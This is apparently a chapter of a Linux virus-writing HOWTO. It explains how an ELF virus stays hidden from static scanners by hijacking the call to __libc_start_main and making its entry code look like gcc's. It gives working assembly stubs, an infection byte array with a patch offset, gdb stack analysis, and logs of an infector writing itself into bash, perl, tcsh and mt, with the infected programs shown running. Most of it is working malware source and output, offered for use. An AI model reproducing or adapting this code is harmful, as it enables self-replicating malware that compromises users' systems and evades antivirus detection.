A person who is more than casually interested in computers should be well schooled in machine language, since it is a fundamental part of a computer. | |
Donald Knuth |
The scanners Scan segment padding and Scan entry point (i) Second scan check program layout for deviations. On a typical Linux distribution this yields good results since all programs are compiled and linked with the same set of tools. But there are legitimate reasons for executables to look different. Some rescue tools and non-free executables are linked statically to be independent of the target system. [1]
asmutils is a set of miscellaneous utilities written in assembly language, targeted on embedded systems and small distributions (e.g. installation or rescue disks); also it contains a small libc and a crypto library. It features the smallest possible size and memory requirements, the fastest speed, and offers fairly good functionality.
The next best approach is to follow the flow of control and verify visited code, starting from the entry point. Again this relies on a certain homogeneity of executables.
A very simple check is alignment. We handle that in target_copy_and_infect and and Section 10.6. gcc(1) never starts functions on odd addresses. But neither VIT nor RST seem to care and put the infection after the last byte of the code segment.
The improved versions of patchEntryAddr in The entry point do a primitive check of the call to __libc_start_main. Since we leave the entry point unmodified we pass this test.
The next step is to check entry code of functions called by __libc_start_main, especially main. We are vulnerable to this.
Section 9.5 patches the call of __libc_start_main to invoke our virus code instead of main. To stay undetected our code should mimic the real thing. The disassembly of our first program shows everything we need to know. But then that listing was retrieved through heavy cheating.
To disassembly the main of a regular executable we extend the exercise of Disassemble it again, Sam. The script performs no kind of error checking. Feeding anything else than executables built by gcc(1) can have strange effects (like no output at all). There is also no limit on output length. In the examples below the Makefile building this document used head(1).
Command: pre/i386-redhat7.3-linux/stub_revisited/intel.sh
#!/bin/bash
file=${1:-/bin/bash}
entry_point=$( /usr/bin/od -j24 -An -td4 -N4 ${file} )
# 134512640 = 0x8048000
# 24 = offset to address of main in code of _start
main_point_ofs=$( expr ${entry_point} - 134512640 + 24 )
main=$( /usr/bin/od -j${main_point_ofs} -An -td4 -N4 ${file} )
main_ofs=$( expr ${main} - 134512640 )
ndisasm -e ${main_ofs} -o ${main} -U ${file} |
First a simple test. Compare with above mentioned disassembly.
Output: out/i386-redhat7.3-linux/stub_revisited/magic_elf.disasm
08048400 55 push ebp
08048401 89E5 mov ebp,esp
08048403 83EC0C sub esp,byte +0xc
08048406 6A03 push byte +0x3
08048408 6801800408 push dword 0x8048001
0804840D 6A01 push byte +0x1
0804840F E8BCFEFFFF call 0x80482d0
08048414 B800000000 mov eax,0x0
08048419 C9 leave
0804841A C3 ret |
A look at tmp/doing_it_in_c/e3/sh_infected.
Output: out/i386-redhat7.3-linux/stub_revisited/bash_infected.disasm
080C6420 6840950508 push dword 0x8059540
080C6425 9C pushf
080C6426 60 pusha
080C6427 E804000000 call 0x80c6430
080C642C 61 popa
080C642D 9D popf
080C642E C3 ret
080C642F 90 nop
080C6430 55 push ebp
080C6431 89E5 mov ebp,esp
080C6433 57 push edi |
And this is plain /bin/bash.
Output: out/i386-redhat7.3-linux/stub_revisited/sh.disasm
08059540 55 push ebp
08059541 89E5 mov ebp,esp
08059543 57 push edi
08059544 56 push esi
08059545 53 push ebx
08059546 83EC24 sub esp,byte +0x24
08059549 8B4508 mov eax,[ebp+0x8]
0805954C 6A01 push byte +0x1
0805954E 68600B0D08 push dword 0x80d0b60
08059553 8945E4 mov [ebp-0x1c],eax |
The first two instructions, making up three bytes, are constant. They are followed by an optional series of push to save special registers. Then comes a sub esp to reserve space for local variables. This also seems to be constant. The trivial program in The magic of the Elf does not use local variables and still ends up with a sub.
For the exit code of /bin/bash we need a better filter.
Command: pre/i386-redhat7.3-linux/stub_revisited/intel_ret.sh
#!/bin/bash
( pre/i386-redhat7.3-linux/stub_revisited/intel.sh "$@" 2>&1 ) \
| /bin/sed /ret/q \
| /usr/bin/tail |
Output: out/i386-redhat7.3-linux/stub_revisited/sh_ret.disasm
08059D96 7409 jz 0x8059da1
08059D98 80382D cmp byte [eax],0x2d
08059D9B 0F84C4FEFFFF jz near 0x8059c65
08059DA1 8B45F0 mov eax,[ebp-0x10]
08059DA4 8D65F4 lea esp,[ebp-0xc]
08059DA7 5B pop ebx
08059DA8 5E pop esi
08059DA9 5F pop edi
08059DAA 5D pop ebp
08059DAB C3 ret |
I call this weird. It seems that 0xc byte are reserved on the stack just to stay unused. And why does one program use leave and the other pop ebp? A quote from the documentation [2] of nasm [3] :
LEAVE ; C9 [186]
LEAVE destroys a stack frame of the form created by the ENTER instruction [4] It is functionally equivalent to MOV ESP,EBP followed by POP EBP.
I guess that we are safe on that front. It's easy to check the existence of fixed byte values at a certain location (the entry code). But I doubt whether a static scanner could really realize whether a given exit code is just a dummy. Or what instruction a ret effectively jumps to.
Let's examine the stack of In the language of mortals just after the sub was executed. Note that you don't have to quote character "$" in interactive gdb(1) sessions. Instead of "\$sp" you type plain "$sp" to reference the stack pointer.
Command: pre/i386-redhat7.3-linux/stub_revisited/stack.sh
#!/bin/bash
file=${1:-tmp/i386-redhat7.3-linux/magic_elf/magic_elf}
/usr/bin/gdb ${file} -q <<EOT
break main
run
backtrace
printf "esp=%08x ebp=%08x\n", \$esp, \$ebp
x/3xw \$sp
x/3xw \$sp + 12
x/3xw \$sp + 24
x/3xw \$sp + 36
EOT |
Output: out/i386-redhat7.3-linux/stub_revisited/stack
(gdb) Breakpoint 1 at 0x8048406
(gdb) Starting program: /home/alba/virus-writing-HOWTO/tmp/i386-redhat7.3-linux/magic_elf/magic_elf
Breakpoint 1, 0x08048406 in main ()
(gdb) #0 0x08048406 in main ()
#1 0x42017589 in __libc_start_main () from /lib/i686/libc.so.6
(gdb) esp=bffff99c ebp=bffff9a8
(gdb) 0xbffff99c: 0x080483e1 0x08049498 0x08049594
(gdb) 0xbffff9a8: 0xbffff9e8 0x42017589 0x00000001
(gdb) 0xbffff9b4: 0xbffffa14 0xbffffa1c 0x080482ae
(gdb) 0xbffff9c0: 0x08048460 0x00000000 0xbffff9e8
(gdb) |
The program was stopped at address 0x8048406 in function main, which was called from __libc_start_main. We already encountered file
Source: src/stub_revisited/__libc_start_main
# /usr/src/redhat/SOURCES/glibc-2.2.4/sysdeps/generic/libc-start.c
121 if (init)
122 (*init) ();
123
124 #ifdef SHARED
125 if (__builtin_expect (_dl_debug_mask & DL_DEBUG_IMPCALLS, 0))
126 _dl_debug_printf ("\ntransferring control: %s\n\n", argv[0]);
127 #endif
128
129 exit ((*main) (argc, argv, __environ));
130 } |
Looks plausible.
Address | esp | ebp | Contents | Description |
---|---|---|---|---|
The top three values on the stack are just random junk. The instruction just before our break point decremented esp by 0xc = 12 to use that space for local variables. They are not initialized yet, though. | ||||
0xbffff99c | esp + 0 | ebp - 12 | 0x80483e1 | random junk |
0xbffff9a0 | esp + 4 | ebp - 8 | 0x8049498 | random junk |
0xbffff9a4 | esp + 8 | ebp - 4 | 0x8049594 | random junk |
Everything further down - including the next two values - must be preserved for the host code. | ||||
0xbffff9a8 | esp + 12 | ebp + 0 | 0xbffff9e8 | saved ebp |
0xbffff9ac | esp + 16 | ebp + 4 | 0x42017589 | return address |
The next three values are the arguments of main. We declared the function as plain main() so gdb(1) does not know about these identifiers. | ||||
0xbffff9b0 | esp + 20 | ebp + 8 | 0x1 | argc |
0xbffff9b4 | esp + 24 | ebp + 12 | 0xbffffa14 | argv |
0xbffff9b8 | esp + 28 | ebp + 16 | 0xbffffa1c | environ |
The next few values up to 0xbffff9e8 (saved ebp) are local variables of __libc_start_main. |
The new stub must fulfill a few constraints.
Both entry code and exit code is fixed.
The stack below ebp + 0 must not be modified.
After executing infectious code it must jump to the original host code.
Original host code expects the value of esp to be 0xbffff9ac and the value of ebp to be 0xbffff9e8 (values are not constant, just given for illustration).
If we keep original exit code then we must modify the stack. The simplest approach is to move the original ebp one position (4 bytes) down. Original entry code already reserved 12 unused bytes so we don't have to adjust esp. In the free space we store the address of host code.
Source: src/one_step_closer/i2/i386_Linux_intel.S
BITS 32
start: push dword 0 ; replace with original entry address
pushf
pusha
call body
popa
popf
ret
align 8
body: push byte start + 1 ; dummy operation to specifiy offset |
The following disassembly shows stub and the first function of the C part, called body. The stub ends with a few nop instructions to align its size. Flow of control just continues from stub to body. Since this is a regular C function it also has standard entry code. But this does not matter because standard exit code starts with a leave. No matter how much stuff was pushed on the stack between end of stub and exit code of body, the leave instruction will pop off the moved ebp. The following ret then jumps to host code.
Output: out/i386-redhat7.3-linux/doing_it_in_c/e3i2.disasm
08048C38 6800000000 push dword 0x0
08048C3D 9C pushf
08048C3E 60 pusha
08048C3F E804000000 call 0x8048c48
08048C44 61 popa
08048C45 9D popf
08048C46 C3 ret
08048C47 90 nop
08048C48 55 push ebp
08048C49 89E5 mov ebp,esp
08048C4B 57 push edi
08048C4C 83EC04 sub esp,byte +0x4
08048C4F E828000000 call 0x8048c7c
08048C54 8D90C08C0408 lea edx,[eax+0x8048cc0]
08048C5A 89D7 mov edi,edx
08048C5C FC cld
08048C5D B9FFFFFFFF mov ecx,0xffffffff
08048C62 B000 mov al,0x0
08048C64 F2AE repne scasb
08048C66 F7D1 not ecx
08048C68 49 dec ecx
08048C69 51 push ecx
08048C6A 52 push edx
08048C6B 6A01 push byte +0x1
08048C6D 6A04 push byte +0x4
08048C6F E818000000 call 0x8048c8c
08048C74 8B7DFC mov edi,[ebp-0x4]
08048C77 C9 leave
08048C78 C3 ret
08048C79 8D7600 lea esi,[esi+0x0]
08048C7C 55 push ebp
08048C7D 89E5 mov ebp,esp
08048C7F E800000000 call 0x8048c84
08048C84 58 pop eax
08048C85 2D848C0408 sub eax,0x8048c84
08048C8A 5D pop ebp
08048C8B C3 ret
08048C8C 55 push ebp
08048C8D 89E5 mov ebp,esp
08048C8F 53 push ebx
08048C90 56 push esi
08048C91 57 push edi
08048C92 8B7D1C mov edi,[ebp+0x1c]
08048C95 8B7518 mov esi,[ebp+0x18]
08048C98 8B5514 mov edx,[ebp+0x14]
08048C9B 8B4D10 mov ecx,[ebp+0x10]
08048C9E 8B5D0C mov ebx,[ebp+0xc]
08048CA1 8B4508 mov eax,[ebp+0x8]
08048CA4 CD80 int 0x80
08048CA6 5F pop edi
08048CA7 5E pop esi
08048CA8 5B pop ebx
08048CA9 5D pop ebp
08048CAA C3 ret |
Output: out/i386-redhat7.3-linux/doing_it_in_c/e3i2/infect
/bin/tcsh ... wrote 168 bytes, Ok
/usr/bin/perl ... wrote 168 bytes, Ok
/bin/mt ... wrote 168 bytes, Ok
/bin/bash ... wrote 168 bytes, Ok
files=4; ok=4; failed=0 |
Output: out/i386-redhat7.3-linux/doing_it_in_c/test-e3i2
ELF is dead baby, ELF is dead.
tmp/i386-redhat7.3-linux/doing_it_in_c/e3i2/bash_infected
2.05a.0(1)-release
ELF is dead baby, ELF is dead.
usage: mt [-v] [--version] [-h] [ -f device ] command [ count ]
ELF is dead baby, ELF is dead.
tcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF is dead baby, ELF is dead.
This is perl, v5.6.1 built for i386-linux
---
ELF is dead baby, ELF is dead.
GNU bash, version 2.05a.0(1)-release (i686-pc-linux-gnu)
Copyright 2001 Free Software Foundation, Inc. |
This is the same idea, only obfuscated by an intermediate call. Variations on this topic are endless.
Source: src/one_step_closer/i3/i386_Linux_intel.S
BITS 32
push ebp
mov ebp,esp
sub esp,byte 0xc
wrapper: ; replace -1 with address of original host code
mov eax,dword -1
xchg eax,[ebp]
sub ebp,byte 4
mov [ebp],eax
align 8
; dummy instruction to specify offset
push byte wrapper + 1 |
Output = Source: out/i386-redhat7.3-linux/one_step_closer/i3/infection.inc
const unsigned char infection[]
__attribute__ (( aligned(8), section(".text") )) =
{
0x55, /* 00000000: push ebp */
0x89,0xE5, /* 00000001: mov ebp,esp */
0x83,0xEC,0x0C, /* 00000003: sub esp,byte +0xc */
0xB8,0xFF,0xFF,0xFF,0xFF, /* 00000006: mov eax,0xffffffff */
0x87,0x45,0x00, /* 0000000B: xchg eax,[ebp+0x0] */
0x83,0xED,0x04, /* 0000000E: sub ebp,byte +0x4 */
0x89,0x45,0x00, /* 00000011: mov [ebp+0x0],eax */
0x90, /* 00000014: nop */
0x90, /* 00000015: nop */
0x90, /* 00000016: nop */
0x90 /* 00000017: nop */
}; /* 26 bytes (0x1a) */
enum { ENTRY_POINT_OFS = 0x7 }; |
Output: out/i386-redhat7.3-linux/doing_it_in_c/e3i3/infect
/bin/tcsh ... wrote 168 bytes, Ok
/usr/bin/perl ... wrote 168 bytes, Ok
/bin/mt ... wrote 168 bytes, Ok
/bin/bash ... wrote 168 bytes, Ok
files=4; ok=4; failed=0 |
Output: out/i386-redhat7.3-linux/doing_it_in_c/test-e3i3
ELF is dead baby, ELF is dead.
tmp/i386-redhat7.3-linux/doing_it_in_c/e3i3/bash_infected
2.05a.0(1)-release
ELF is dead baby, ELF is dead.
usage: mt [-v] [--version] [-h] [ -f device ] command [ count ]
ELF is dead baby, ELF is dead.
tcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF is dead baby, ELF is dead.
This is perl, v5.6.1 built for i386-linux
---
ELF is dead baby, ELF is dead.
GNU bash, version 2.05a.0(1)-release (i686-pc-linux-gnu)
Copyright 2001 Free Software Foundation, Inc. |
[1] | |
[2] | http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.94 |
[3] | |
[4] | http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.27 |